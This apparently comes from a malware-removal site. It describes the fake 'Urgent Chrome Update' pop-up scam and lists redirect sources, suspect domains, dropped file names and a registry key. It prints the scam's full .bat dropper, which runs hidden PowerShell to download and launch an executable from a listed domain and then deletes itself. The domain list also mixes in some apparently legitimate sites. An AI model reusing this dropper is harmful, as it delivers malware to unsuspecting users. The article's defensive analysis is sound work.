Urgent Chrome Update "Virus" - How to Remove It

Urgent Chrome Update “Virus” – How to Remove It

The article will aid you to remove the Urgent Chrome Update “virus” completely. Follow the malware removal instructions at the bottom of the article.

Urgent Chrome Update “virus” is a fake message that tries to scare you or rather trick you into launching whatever file is hosted on it. It usually comes in the form of a pop-up, but it may also open a whole page or a new tab by switching to that page. Amazon, Facebook, Yahoo and e-mail messages are reported to redirect you or even spawn this fake message. What happens is that it automatically downloads a file called chrome-update.bat and if you run it, your whole system could get encrypted. Other causes, such as installing less dangerous malware into your system, like an adware or a browser hijacker are also possible outcomes.

Threat Summary

NameUrgent Chrome Update "Virus"
TypeRedirect, Scam, PUP
Short DescriptionYou see a message saying Urgent Chrome Update, while the page auto-downloads a .bat file. Opening the file encrypts your computer system.
SymptomsYou are redirected to a page which has a message stating that you need an Urgent Chrome Update that is fake.
Distribution MethodFreeware Installations, Bundled Packages, Redirects from Sites
Detection Tool See If Your System Has Been Affected by Urgent Chrome Update "Virus"


Malware Removal Tool

User ExperienceJoin Our Forum to Discuss Urgent Chrome Update "Virus".

Urgent Chrome Update “Virus” – Distribution

The spawning of the Urgent Chrome Update message could be distributed with various methods, the most reported of which is via e-mails and redirects from social networks. Reported networks that have been compromised or used for generating redirects with the Urgent Chrome Update messages are the following:

  • Facebook
  • Tumblr
  • Reddit
  • Pinterest
  • Yahoo and its services
  • Amazon and related sites

Other sites could have been compromised as well (or more likely their advertisements). These websites and social networks are not spreading the malicious file or redirect themselves, it’s just that the malware author chose them or found vulnerabilities to exploit to spread his program. Sometimes there is an .hta file, instead of the .bat one that contains a script with a download which encrypts your system or an adware version where you keep seeing the Urgent Chrome Update message along with lots of advertisements. Sometimes these files are programmed to show an installer setup before making changes to your computer to seem legitimate. Some of the setups could be inside a more aggressive adware installer coming with a bundle package.

Urgent Chrome Update is not excluded to be distributed with other methods, like add-ons or extensions added to your browser. When installed, they could start showing you advertisements, such as banners, pop-ups, pop-unders, whole page adverts and redirect you to various places online. Mainly the Google Chrome browser is affected, but the Urgent Chrome Update might show in other browsers.

Urgent Chrome Update “Virus” – Analysis

The Urgent Chrome Update message not to be treated lightly as it contains threats that can affect your computer machine in a bad way. Its malicious intent is undoubtedly present. The message is triggered from a redirect stemming either your e-mail service or a popular website which is either a social network or some kind of a site that sells goods. The most commonly exploited ones were mentioned in the Distribution section above. What happens next is that you see the Urgent Chrome Update message in either a pop-up, full-page notification or something similar. An example of one such redirect leading to a full-page message is shown below:

As you can see, the message is convincing as it uses the same logo as the Google Chrome browser, but also the same page design and button designs. What should throw you off is the domain that is shown in the URL address bar – it is unfamiliar and not known to be official, it is long and makes no sense. Examples of actual domain addresses which have spammed and spread Urgent Chrome Update messages are the following:

  • https://wegoobackonpointe.org
  • https://eeteeinsightsoft.org/1171650884382/
  • https://johjukrawall.net/8742906595196/7124820f2e8a80b357e0aa4ab96d705a
  • https://eishuscanmyessay.net/4882906595196/
  • https://aihahconsumerproductexposed.net/8712906595196/
  • https://yungionpage-tool.net/8161207311627/
  • https://yungionpage-tool.net/4561660827396/
  • https://kohphcctcct.net/3591668561808/
  • https://ws-00921qlk.r.worldssl.net/2401825818691/
  • https://elaetbucketexplorer.net/531841073279/
  • https\\:securebrowser.online
  • http://www.venturead.com/a/display.php?r=1113014
  • https://cubaedanto.net/9121124784762/
  • https://mahseeksperttv.com/7521817513667/
  • https://ibeelautotravel.com/7371071833663/ed5067ae87d7821e21bd0aec93e62c0b/
  • https://eliewgadgec.org/2952926573219/cb7b9f9616e585ea1a831bccdd7364b9/
  • https://aamaebuzzbookmarks.com/1151266950534/93f9b6c8b205a119425610de94d44d09/
  • https://vuxaibookmarkplayer.org/7191235857935/c2a6044c4797586dba118a4b1a5fc10e/
  • https://haephofcourse.org/6852925739117/0f19c4437a980572983c94a373660da8/
  • kxan.com
  • https://eaqueinfobar.com/8541824387942/
  • https://uabaetudoparawordpress.com/144850685323/
  • kiss-anime.me
  • https://akeeckickette.org/733679796354/
  • allrecipes.com
  • https://aesipspaghetticoder.org/7691828163121/
  • https://niaghmarykayintouch.org/1091828163121/
  • https://leejopr-canada.com/176848260300/
  • https://zahnopolicytiger.com/4211635439938/42c6aa8fc87ef7cddbaea42cb96f9664/
  • earthsky.org

All of the above URLs are just for referential purposes and not complete – do not visit or download anything from them. From all of the above URLs, the Urgent Chrome Update message will be displayed and once loaded it will automatically download a file. The file has the following variations:

  • chrome-update.bat
  • chrome-update.hta
  • chrome-update.vbs
  • chrome-update.zip

Some of these files could launch a setup, trying to copy the one of Google Chrome, but could also use a similar logo, which is not exactly the same. You can see an example of such a setup from the below picture:

Any of these files are stored inside the following location:


They also make changes to the following registry entries:


→HKCU\Software\Microsoft\Windows\Current Version\Internet Settings\Connections


This could mean that the innate Windows PowerShell Remote Access Server is accessed and could be used to download a setup for malware or a decryption program and execute it. Inside the .bat file you can see the following code:

@echo off
echo a=new ActiveXObject(‘Wscript.Shell’);a.run(“PowerShell -WindowStyle Hidden $d=$env:temp+’\\16330788701ac441736751e3ee3c6996.exe’;(New-Object System.Net.WebClient).DownloadFile(‘https://eeteeinsightsoft.org/17/524.dat’,$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName(‘System.Windows.Forms’);[system.windows.forms.messagebox]::show(‘Update complete.’,’Information’,[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)”,0,false); >”%temp%\install_flash.js”
start /min “” wscript.exe “%temp%\install_flash.js”
DEL “%~f0

It downloads a file via that script from a domain and tries to hide it, also installs a JavaScript object into Adobe Flash which could run more fake messages, advertisements or other malware. In case you see files downloaded on your computer that have not been downloaded by you and are not authorized, do not run them and just delete them. Then you should definitely run a full scan with an Anti-Virus and an Anti-Malware tool to be certain no leftovers have remained hidden on your personal computer.

In case a browser hijacker version is developed or you have installed a file related to the Urgent Chrome Update, and you notice your browser is changed, do not enter any information in its search bars. Be careful of what data you provide on such search pages, if that is your only browser available and you need to gather information about the situation. Don’t be clicking on suspicious advertisements or links that are displayed by the Urgent Chrome Update.

Urgent Chrome Update “Virus” – How to Remove It

To remove Urgent Chrome Update message and its files manually from your computer, follow the step-by-step removal instructions provided below. In case the manual removal does not get rid of the message, redirect and its files completely, you should search for and remove any leftovers with an advanced anti-malware tool. Such a program can keep your computer safe in the future.

Berta Bilbao

Berta is a dedicated malware researcher, dreaming for a more secure cyber space. Her fascination with IT security began a few years ago when a malware locked her out of her own computer.

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Share on Twitter Tweet
Share on Google Plus Share
Share on Linkedin Share
Share on Digg Share
Share on Reddit Share
Share on Stumbleupon Share